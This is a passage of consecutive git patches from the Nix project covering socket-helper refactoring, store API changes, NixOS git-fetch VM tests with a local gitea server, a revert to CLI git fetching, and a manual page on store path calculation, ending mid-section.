--- src/libutil/unix-domain-socket.cc | 84 ++++++++++++------------------- 1 file changed, 33 insertions(+), 51 deletions(-) diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index 3b6d54a2c..0bcf9040d 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -38,52 +38,20 @@ AutoCloseFD createUnixDomainSocket(const Path & path, mode_t mode) return fdSocket; } -static struct sockaddr* safeSockAddrPointerCast(struct sockaddr_un *addr) { - // Casting between types like these legacy C library interfaces require - // is forbidden in C++. - // To maintain backwards compatibility, the implementation of the - // bind function contains some hints to the compiler that allow for this + +static void bindConnectProcHelper( + std::string_view operationName, auto && operation, + int fd, const std::string & path) +{ + struct sockaddr_un addr; + addr.sun_family = AF_UNIX; + + // Casting between types like these legacy C library interfaces + // require is forbidden in C++. To maintain backwards + // compatibility, the implementation of the bind/connect functions + // contains some hints to the compiler that allow for this // special case. 
- return reinterpret_cast(addr); -} - -void bind(int fd, const std::string & path) -{ - unlink(path.c_str()); - - struct sockaddr_un addr; - addr.sun_family = AF_UNIX; - auto psaddr {safeSockAddrPointerCast(&addr)}; - - if (path.size() + 1 >= sizeof(addr.sun_path)) { - Pid pid = startProcess([&] { - Path dir = dirOf(path); - if (chdir(dir.c_str()) == -1) - throw SysError("chdir to '%s' failed", dir); - std::string base(baseNameOf(path)); - if (base.size() + 1 >= sizeof(addr.sun_path)) - throw Error("socket path '%s' is too long", base); - memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (bind(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot bind to socket '%s'", path); - _exit(0); - }); - int status = pid.wait(); - if (status != 0) - throw Error("cannot bind to socket '%s'", path); - } else { - memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (bind(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot bind to socket '%s'", path); - } -} - - -void connect(int fd, const std::string & path) -{ - struct sockaddr_un addr; - addr.sun_family = AF_UNIX; - auto psaddr {safeSockAddrPointerCast(&addr)}; + auto * psaddr = reinterpret_cast(&addr); if (path.size() + 1 >= sizeof(addr.sun_path)) { Pipe pipe; @@ -98,8 +66,8 @@ void connect(int fd, const std::string & path) if (base.size() + 1 >= sizeof(addr.sun_path)) throw Error("socket path '%s' is too long", base); memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (connect(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot connect to socket at '%s'", path); + if (operation(fd, psaddr, sizeof(addr)) == -1) + throw SysError("cannot %s to socket at '%s'", operationName, path); writeFull(pipe.writeSide.get(), "0\n"); } catch (SysError & e) { writeFull(pipe.writeSide.get(), fmt("%d\n", e.errNo)); @@ -110,16 +78,30 @@ void connect(int fd, const std::string & path) pipe.writeSide.close(); auto errNo = string2Int(chomp(drainFD(pipe.readSide.get()))); if (!errNo || *errNo == -1) - throw 
Error("cannot connect to socket at '%s'", path); + throw Error("cannot %s to socket at '%s'", operationName, path); else if (*errNo > 0) { errno = *errNo; - throw SysError("cannot connect to socket at '%s'", path); + throw SysError("cannot %s to socket at '%s'", operationName, path); } } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (connect(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot connect to socket at '%s'", path); + if (operation(fd, psaddr, sizeof(addr)) == -1) + throw SysError("cannot %s to socket at '%s'", operationName, path); } } + +void bind(int fd, const std::string & path) +{ + unlink(path.c_str()); + + bindConnectProcHelper("bind", ::bind, fd, path); +} + + +void connect(int fd, const std::string & path) +{ + bindConnectProcHelper("connect", ::connect, fd, path); +} + } From 574db8350491d8da3f65625de1f91bc667e67360 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 17 Jan 2024 23:46:03 -0500 Subject: [PATCH 293/654] Push `addToStoreFromDump` `unsupported(...)` down `Store` class hierarchy Instead of having it be the default method in `Store` itself, have it be the implementation in `DummyStore` and `LegacySSHStore`. Then just the implementations which fail to provide the method pay the "penalty" of dealing with the icky `unimplemented` function for non-compliance. Picks up where #8217. Getting close to no `unsupported` in the `Store` interface itself! More progress on issue #5729. 
--- src/libstore/dummy-store.cc | 9 +++++++++ src/libstore/legacy-ssh-store.hh | 9 +++++++++ src/libstore/store-api.hh | 3 +-- 3 files changed, 19 insertions(+), 2 deletions(-) diff --git a/src/libstore/dummy-store.cc b/src/libstore/dummy-store.cc index f52a309d1..e4f13b8f4 100644 --- a/src/libstore/dummy-store.cc +++ b/src/libstore/dummy-store.cc @@ -58,6 +58,15 @@ struct DummyStore : public virtual DummyStoreConfig, public virtual Store RepairFlag repair, CheckSigsFlag checkSigs) override { unsupported("addToStore"); } + virtual StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) override + { unsupported("addToStore"); } + void narFromPath(const StorePath & path, Sink & sink) override { unsupported("narFromPath"); } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index c5a3ce677..7cee31d66 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -69,6 +69,15 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor RepairFlag repair) override { unsupported("addToStore"); } + virtual StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) override + { unsupported("addToStore"); } + private: void putBuildSettings(Connection & conn); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 9667b5e9e..b3c935db1 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -466,8 +466,7 @@ public: ContentAddressMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, const StorePathSet & 
references = StorePathSet(), - RepairFlag repair = NoRepair) - { unsupported("addToStoreFromDump"); } + RepairFlag repair = NoRepair) = 0; /** * Add a mapping indicating that `deriver!outputName` maps to the output path From 78074bdea4fcb4403cc7b1e533d1fcbcf51e01a5 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 12:47:29 +0100 Subject: [PATCH 294/654] tests/nixos/fetch-git: Apply suggestions --- tests/nixos/fetch-git/default.nix | 2 +- tests/nixos/fetch-git/testsupport/setup.nix | 3 --- 2 files changed, 1 insertion(+), 4 deletions(-) diff --git a/tests/nixos/fetch-git/default.nix b/tests/nixos/fetch-git/default.nix index 254fecaaf..1d6bcb637 100644 --- a/tests/nixos/fetch-git/default.nix +++ b/tests/nixos/fetch-git/default.nix @@ -24,7 +24,7 @@ testCases = map (testCaseName: {...}: { - imports = ["${./test-cases}/${testCaseName}"]; + imports = [ (./test-cases + "/${testCaseName}") ]; # ensures tests are named like their directories they are defined in name = testCaseName; }) diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix index 2f74f51f8..8fc8e2e7c 100644 --- a/tests/nixos/fetch-git/testsupport/setup.nix +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -39,9 +39,6 @@ in The name of the test case. A repository with that name will be set up on the gitea server and locally. 
- - This name can also be used to execute only a single test case via: - `nix build .#hydraJobs.fetch-git.{test-case-name}` ''; }; options.description = mkOption { From 1fe8f54bd30fead52d21ae472fb4f0f68a5c6fdd Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 15:27:57 +0100 Subject: [PATCH 295/654] Use BackedStringView --- src/libutil/serialise.cc | 2 +- src/libutil/serialise.hh | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index afbf66b9d..7fc211491 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -132,7 +132,7 @@ size_t FdSource::readUnbuffered(char * data, size_t len) n = ::read(fd, data, len); } while (n == -1 && errno == EINTR); if (n == -1) { _good = false; throw SysError("reading from file"); } - if (n == 0) { _good = false; throw EndOfFile(endOfFileError); } + if (n == 0) { _good = false; throw EndOfFile(std::string(*endOfFileError)); } read += n; return n; } diff --git a/src/libutil/serialise.hh b/src/libutil/serialise.hh index 689b2070b..d9522566f 100644 --- a/src/libutil/serialise.hh +++ b/src/libutil/serialise.hh @@ -153,7 +153,7 @@ struct FdSource : BufferedSource { int fd; size_t read = 0; - std::string endOfFileError{"unexpected end-of-file"}; + BackedStringView endOfFileError{"unexpected end-of-file"}; FdSource() : fd(-1) { } FdSource(int fd) : fd(fd) { } From ab786e22f16eed0d95123d5698eb71079c312584 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 15:29:54 +0100 Subject: [PATCH 296/654] Show what goal is waiting for a build slot --- src/libstore/build/worker.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 974a9f510..d57e22393 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -251,7 +251,7 @@ void Worker::childTerminated(Goal * goal, bool wakeSleepers) void Worker::waitForBuildSlot(GoalPtr goal) { - 
debug("wait for build slot"); + goal->trace("wait for build slot"); bool isSubstitutionGoal = goal->jobCategory() == JobCategory::Substitution; if ((!isSubstitutionGoal && getNrLocalBuilds() < settings.maxBuildJobs) || (isSubstitutionGoal && getNrSubstitutions() < settings.maxSubstitutionJobs)) From a18d8d688a826ff535b3eeff289ef51db33a413b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 17:01:45 +0100 Subject: [PATCH 297/654] LocalStore::addToStore(): Ignore exceptions from parseDump() In the "discard" case (i.e. when the store path already exists locally), when we call parseDump() from a Finally and it throws an exception (e.g. if the download of the NAR fails), Nix crashes: terminate called after throwing an instance of 'nix::SubstituteGone' what(): error: file 'nar/06br3254rx4gz4cvjzxlv028jrx80zg5i4jr62vjmn416dqihgr7.nar.xz' does not exist in binary cache 'http://localhost' Aborted (core dumped) --- src/libstore/local-store.cc | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 5a399c8be..07068f8f8 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1049,7 +1049,11 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, Finally cleanup = [&]() { if (!narRead) { NullParseSink sink; - parseDump(sink, source); + try { + parseDump(sink, source); + } catch (...) { + ignoreException(); + } } }; From dca0a802405be9798e12ad8be2ec6d227d9a2fa2 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 17:16:34 +0100 Subject: [PATCH 298/654] copyStorePath(): Bail out early if the store path already exists In rare cases (e.g. when using allowSubstitutes = false), it's possible that we simultaneously have a DerivationGoal *and* a SubstitutionGoal building the same path. 
So if a DerivationGoal already built the path while the SubstitutionGoal was waiting for a download slot, it saves us a superfluous download to exit early. --- src/libstore/store-api.cc | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 0c37ecd30..9cb187e66 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -981,6 +981,11 @@ void copyStorePath( RepairFlag repair, CheckSigsFlag checkSigs) { + /* Bail out early (before starting a download from srcStore) if + dstStore already has this path. */ + if (!repair && dstStore.isValidPath(storePath)) + return; + auto srcUri = srcStore.getUri(); auto dstUri = dstStore.getUri(); auto storePathS = srcStore.printStorePath(storePath); From fd41979d7857f6984b4b7571706a45b16f9c0a5d Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 13:12:59 +0100 Subject: [PATCH 299/654] tests/nixos/fetch-git: Factor out gitea repo module --- .../fetch-git/testsupport/gitea-repo.nix | 51 +++++++++++++++++++ tests/nixos/fetch-git/testsupport/gitea.nix | 2 + tests/nixos/fetch-git/testsupport/setup.nix | 44 +++++----------- 3 files changed, 65 insertions(+), 32 deletions(-) create mode 100644 tests/nixos/fetch-git/testsupport/gitea-repo.nix diff --git a/tests/nixos/fetch-git/testsupport/gitea-repo.nix b/tests/nixos/fetch-git/testsupport/gitea-repo.nix new file mode 100644 index 000000000..916552bb2 --- /dev/null +++ b/tests/nixos/fetch-git/testsupport/gitea-repo.nix @@ -0,0 +1,51 @@ +{ lib, ... }: +let + inherit (lib) mkOption types; + + testCaseExtension = { config, ... }: { + setupScript = '' + repo = Repo("${config.name}") + ''; + }; +in +{ + options = { + testCases = mkOption { + type = types.listOf (types.submodule testCaseExtension); + }; + }; + config = { + setupScript = '' + class Repo: + """ + A class to create a git repository on the gitea server and locally. 
+ """ + def __init__(self, name): + self.name = name + self.path = "/tmp/repos/" + name + self.remote = "http://gitea:3000/test/" + name + self.remote_ssh = "ssh://gitea/root/" + name + self.git = f"git -C {self.path}" + self.create() + + def create(self): + # create ssh remote repo + gitea.succeed(f""" + git init --bare -b main /root/{self.name} + """) + # create http remote repo + gitea.succeed(f""" + curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ + -H 'Accept: application/json' -H 'Content-Type: application/json' \ + -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} + """) + # setup git remotes on client + client.succeed(f""" + mkdir -p {self.path} \ + && git init -b main {self.path} \ + && {self.git} remote add origin {self.remote} \ + && {self.git} remote add origin-ssh root@gitea:{self.name} + """) + ''; + }; +} \ No newline at end of file diff --git a/tests/nixos/fetch-git/testsupport/gitea.nix b/tests/nixos/fetch-git/testsupport/gitea.nix index 2ea23961e..cf87bb466 100644 --- a/tests/nixos/fetch-git/testsupport/gitea.nix +++ b/tests/nixos/fetch-git/testsupport/gitea.nix @@ -15,6 +15,7 @@ in { imports = [ ../testsupport/setup.nix + ../testsupport/gitea-repo.nix ]; nodes = { gitea = { pkgs, ... }: { @@ -96,5 +97,6 @@ in { client.succeed(""" ssh root@gitea true """) + ''; } diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix index 8fc8e2e7c..a81d5614b 100644 --- a/tests/nixos/fetch-git/testsupport/setup.nix +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -12,7 +12,10 @@ let ### TEST ${testCase.name}: ${testCase.description} ### with subtest("${testCase.description}"): - repo = Repo("${testCase.name}") + # Setup + ${indent testCase.setupScript} + + # Test ${indent testCase.script} ''; in @@ -47,12 +50,19 @@ in A description of the test case. 
''; }; + options.setupScript = mkOption { + type = types.lines; + description = '' + Python code that runs before the test case. + ''; + default = ""; + }; options.script = mkOption { type = types.lines; description = '' Python code that runs the test. - Variables defined by `setupScript` will be available here. + Variables defined by the global `setupScript`, as well as `testCases.*.setupScript` will be available here. ''; }; }); @@ -67,36 +77,6 @@ in nix.settings.experimental-features = ["nix-command" "flakes"]; }; setupScript = '' - class Repo: - """ - A class to create a git repository on the gitea server and locally. - """ - def __init__(self, name): - self.name = name - self.path = "/tmp/repos/" + name - self.remote = "http://gitea:3000/test/" + name - self.remote_ssh = "ssh://gitea/root/" + name - self.git = f"git -C {self.path}" - self.create() - - def create(self): - # create ssh remote repo - gitea.succeed(f""" - git init --bare -b main /root/{self.name} - """) - # create http remote repo - gitea.succeed(f""" - curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ - -H 'Accept: application/json' -H 'Content-Type: application/json' \ - -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} - """) - # setup git remotes on client - client.succeed(f""" - mkdir -p {self.path} \ - && git init -b main {self.path} \ - && {self.git} remote add origin {self.remote} \ - && {self.git} remote add origin-ssh root@gitea:{self.name} - """) ''; testScript = '' start_all(); From 94eba0ebbbadfa48a4c1253cb94070a41310fae2 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 13:42:41 +0100 Subject: [PATCH 300/654] tests/nixos/fetch-git: Memoize -> save Memoization is for thunk-like behavior whereas this is executed eagerly. 
--- tests/nixos/fetch-git/test-cases/http-simple/default.nix | 2 +- tests/nixos/fetch-git/test-cases/ssh-simple/default.nix | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/nixos/fetch-git/test-cases/http-simple/default.nix b/tests/nixos/fetch-git/test-cases/http-simple/default.nix index 1bd5bbba2..333ee45fd 100644 --- a/tests/nixos/fetch-git/test-cases/http-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/http-simple/default.nix @@ -8,7 +8,7 @@ && {repo.git} commit -m 'commit1' """) - # memoize the revision + # save the revision rev1 = client.succeed(f""" {repo.git} rev-parse HEAD """).strip() diff --git a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix index 0e4494ae0..f2deca141 100644 --- a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix @@ -8,7 +8,7 @@ && {repo.git} commit -m 'commit1' """) - # memoize the revision + # save the revision rev1 = client.succeed(f""" {repo.git} rev-parse HEAD """).strip() From 12541704052849d4160a13f7bbd873b40f19a3f9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 20:56:33 +0100 Subject: [PATCH 301/654] tests/nixos/fetch-git: Make the store paths unique --- tests/nixos/fetch-git/test-cases/http-simple/default.nix | 6 ++++-- tests/nixos/fetch-git/test-cases/ssh-simple/default.nix | 6 ++++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/tests/nixos/fetch-git/test-cases/http-simple/default.nix b/tests/nixos/fetch-git/test-cases/http-simple/default.nix index 333ee45fd..dcab8067e 100644 --- a/tests/nixos/fetch-git/test-cases/http-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/http-simple/default.nix @@ -1,10 +1,12 @@ +{ config, ... 
}: { description = "can fetch a git repo via http"; script = '' # add a file to the repo client.succeed(f""" - echo chiang-mai > {repo.path}/thailand \ - && {repo.git} add thailand \ + echo ${config.name /* to make the git tree and store path unique */} > {repo.path}/test-case \ + && echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add test-case thailand \ && {repo.git} commit -m 'commit1' """) diff --git a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix index f2deca141..f5fba1698 100644 --- a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix @@ -1,10 +1,12 @@ +{ config, ... }: { description = "can fetch a git repo via ssh"; script = '' # add a file to the repo client.succeed(f""" - echo chiang-mai > {repo.path}/thailand \ - && {repo.git} add thailand \ + echo ${config.name /* to make the git tree and store path unique */} > {repo.path}/test-case \ + && echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add test-case thailand \ && {repo.git} commit -m 'commit1' """) From ed975e953c30c335f8403352acc785323a5a925c Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 20:59:24 +0100 Subject: [PATCH 302/654] tests/nixos/fetch-git: Testsupport for private repos --- .../fetch-git/testsupport/gitea-repo.nix | 36 +++++++++++++++---- 1 file changed, 30 insertions(+), 6 deletions(-) diff --git a/tests/nixos/fetch-git/testsupport/gitea-repo.nix b/tests/nixos/fetch-git/testsupport/gitea-repo.nix index 916552bb2..a3ad65ca4 100644 --- a/tests/nixos/fetch-git/testsupport/gitea-repo.nix +++ b/tests/nixos/fetch-git/testsupport/gitea-repo.nix @@ -1,11 +1,31 @@ { lib, ... }: let - inherit (lib) mkOption types; + inherit (lib) + mkIf + mkOption + types + ; + + boolPyLiteral = b: if b then "True" else "False"; testCaseExtension = { config, ... 
}: { - setupScript = '' - repo = Repo("${config.name}") - ''; + options = { + repo.enable = mkOption { + type = types.bool; + default = true; + description = "Whether to provide a repo variable - automatic repo creation."; + }; + repo.private = mkOption { + type = types.bool; + default = false; + description = "Whether the repo should be private."; + }; + }; + config = mkIf config.repo.enable { + setupScript = '' + repo = Repo("${config.name}", private=${boolPyLiteral config.repo.private}) + ''; + }; }; in { @@ -16,16 +36,20 @@ in }; config = { setupScript = '' + def boolToJSON(b): + return "true" if b else "false" + class Repo: """ A class to create a git repository on the gitea server and locally. """ - def __init__(self, name): + def __init__(self, name, private=False): self.name = name self.path = "/tmp/repos/" + name self.remote = "http://gitea:3000/test/" + name self.remote_ssh = "ssh://gitea/root/" + name self.git = f"git -C {self.path}" + self.private = private self.create() def create(self): @@ -37,7 +61,7 @@ in gitea.succeed(f""" curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ -H 'Accept: application/json' -H 'Content-Type: application/json' \ - -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} + -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main", "private": {boolToJSON(self.private)}}}' )} """) # setup git remotes on client client.succeed(f""" From 76a50b3a69dd7202fa4c68ca8d12fde152e6341a Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 22:25:30 +0100 Subject: [PATCH 303/654] doc: GitRepoImpl::path --- src/libfetchers/git-utils.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 6726407b5..f34329fab 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -139,6 +139,7 @@ T peelObject(git_repository * repo, git_object * obj, git_object_t type) struct 
GitRepoImpl : GitRepo, std::enable_shared_from_this { + /** Location of the repository on disk. */ CanonPath path; Repository repo; From 8d422c2fef4309b4b7de8e2f909957775a9ec3ef Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 22:26:24 +0100 Subject: [PATCH 304/654] Revert libgit2 fetching libgit2 is not capable of using git-credentials helpers yet. This prevents private repositories from being used. Based on code that was replaced in https://github.com/NixOS/nix/pull/9240 (Introduce libgit2); hence: Co-authored-by: Eelco Dolstra --- src/libfetchers/git-utils.cc | 31 ++++++++++++------------------- 1 file changed, 12 insertions(+), 19 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index f34329fab..911c16c4b 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -383,27 +383,20 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this { Activity act(*logger, lvlTalkative, actFetchTree, fmt("fetching Git repository '%s'", url)); - Remote remote; + // TODO: implement git-credential helper support (preferably via libgit2, which as of 2024-01 does not support that) + // then use code that was removed in this commit (see blame) - if (git_remote_create_anonymous(Setter(remote), *this, url.c_str())) - throw Error("cannot create Git remote '%s': %s", url, git_error_last()->message); + auto dir = this->path; - char * refspecs[] = {(char *) refspec.c_str()}; - git_strarray refspecs2 { - .strings = refspecs, - .count = 1 - }; - - git_fetch_options opts = GIT_FETCH_OPTIONS_INIT; - // FIXME: for some reason, shallow fetching over ssh barfs - // with "could not read from remote repository". - opts.depth = shallow && parseURL(url).scheme != "ssh" ? 
1 : GIT_FETCH_DEPTH_FULL; - opts.callbacks.payload = &act; - opts.callbacks.sideband_progress = sidebandProgressCallback; - opts.callbacks.transfer_progress = transferProgressCallback; - - if (git_remote_fetch(remote.get(), &refspecs2, &opts, nullptr)) - throw Error("fetching '%s' from '%s': %s", refspec, url, git_error_last()->message); + runProgram(RunOptions { + .program = "git", + .searchPath = true, + // FIXME: git stderr messes up our progress indicator, so + // we're using --quiet for now. Should process its stderr. + .args = { "-C", path.abs(), "fetch", "--quiet", "--force", "--", url, refspec }, + .input = {}, + .isInteractive = true + }); } void verifyCommit( From 346d513d86491f2040735d22ba49cb0d701edb70 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 22:34:38 +0100 Subject: [PATCH 305/654] tests/nixos/fetch-git: Add http-auth test --- .../test-cases/http-auth/default.nix | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 tests/nixos/fetch-git/test-cases/http-auth/default.nix diff --git a/tests/nixos/fetch-git/test-cases/http-auth/default.nix b/tests/nixos/fetch-git/test-cases/http-auth/default.nix new file mode 100644 index 000000000..d483d54fb --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/http-auth/default.nix @@ -0,0 +1,40 @@ +{ config, ... 
}: +{ + description = "can fetch a private git repo via http"; + repo.private = true; + script = '' + # add a file to the repo + client.succeed(f""" + echo ${config.name /* to make the git tree and store path unique */} > {repo.path}/test-case \ + && echo lutyabrook > {repo.path}/new-york-state \ + && {repo.git} add test-case new-york-state \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/new-york-state + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + ''; +} From 14f470ec4e9d481698b97ea2dae101693fbaca95 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 19 Jan 2024 00:32:30 +0100 Subject: [PATCH 306/654] doc/hacking.md: Hint short option `make -e` Co-authored-by: Valentin Gagarin --- doc/manual/src/contributing/hacking.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index fe91787a3..9a7623dc9 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -115,7 +115,7 @@ You can also build Nix for one of the [supported platforms](#platforms). You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run `make install`. 
-Run `make` with [`--environment-overrides`](https://www.gnu.org/software/make/manual/make.html#index-_002de) to allow environment variables to override `Makefile` variables: +Run `make` with [`-e` / `--environment-overrides`](https://www.gnu.org/software/make/manual/make.html#index-_002de) to allow environment variables to override `Makefile` variables: - `ENABLE_BUILD=yes` to enable building the C++ code. - `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). From a34ec0bd123619277e5682b7f6f8da41166e3eab Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 4 Nov 2023 20:10:55 -0400 Subject: [PATCH 307/654] Include store path exact spec in the docs This is niche, but deserves to be in the manual because it is describing behavior visible to the outside world, not mere implementation details. --- doc/manual/src/SUMMARY.md.in | 1 + doc/manual/src/protocols/store-path.md | 104 +++++++++++++++++++++++++ src/libstore/store-api.cc | 84 ++------------------ 3 files changed, 111 insertions(+), 78 deletions(-) create mode 100644 doc/manual/src/protocols/store-path.md diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index c67ddc6cb..e6390c60a 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -106,6 +106,7 @@ - [Architecture and Design](architecture/architecture.md) - [Protocols](protocols/index.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) + - [Exact Store Path Specification](protocols/store-path.md) - [Derivation "ATerm" file format](protocols/derivation-aterm.md) - [Glossary](glossary.md) - [Contributing](contributing/index.md) diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md new file mode 100644 index 000000000..d1c35b05e --- /dev/null +++ b/doc/manual/src/protocols/store-path.md @@ -0,0 +1,104 @@ +# Complete Store Path Calculation + +This is the complete specification for how store paths are calculated. 
+ +Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to. +But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful. + +```bnf + ::= /- +``` +where + +- `` = base-32 representation of the first 160 bits of a [SHA-256] hash of `
`
+
+  This is the hash part of the store name
+
+- `
` = the string `:sha256:::`;
+
+  Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
+  (e.g. you won't get `/nix/store/-name1` and `/nix/store/-name2`, or `/gnu/store/-name1`, with equal hash parts).
+
+- `` = the name of the store object.
+
+- `` = the [store directory](@docroot@/store/store-path.md#store-directory)
+
+- `` = one of:
+
+  - ```bnf
+    text:::...
+    ```
+
+    for encoded derivations written to the store.
+    ` ... ` are the store paths referenced by this path.
+    Those are encoded in the form described by ``.
+
+  - ```bnf
+    source:::...::self
+    ```
+
+    For paths copied to the store and hashed via a [Nix Archive (NAR)] and [SHA-256][sha-256].
+    Just like in the text case, we can have the store objects referenced by their paths.
+    Additionally, we can have an optional `:self` label to denote self reference.
+
+  - ```bnf
+    output:
+    ```
+
+    For either the outputs built from derivations,
+    paths copied to the store that are a single file hashed directly, or hashed via a hash algorithm other than [SHA-256][sha-256].
+    (in that case "source" is used; it's silly, but it's done that way for compatibility).
+
+    `` is the name of the output (usually, "out").
+    For content-addressed store objects, ``, is always "out".
+
+- `` = base-16 representation of a SHA-256 hash of ``
+
+- `` = one of the following based on ``:
+
+  - if `` = `text:...`:
+
+    the string written to the resulting store path.
+
+  - if `` = `source:...`:
+
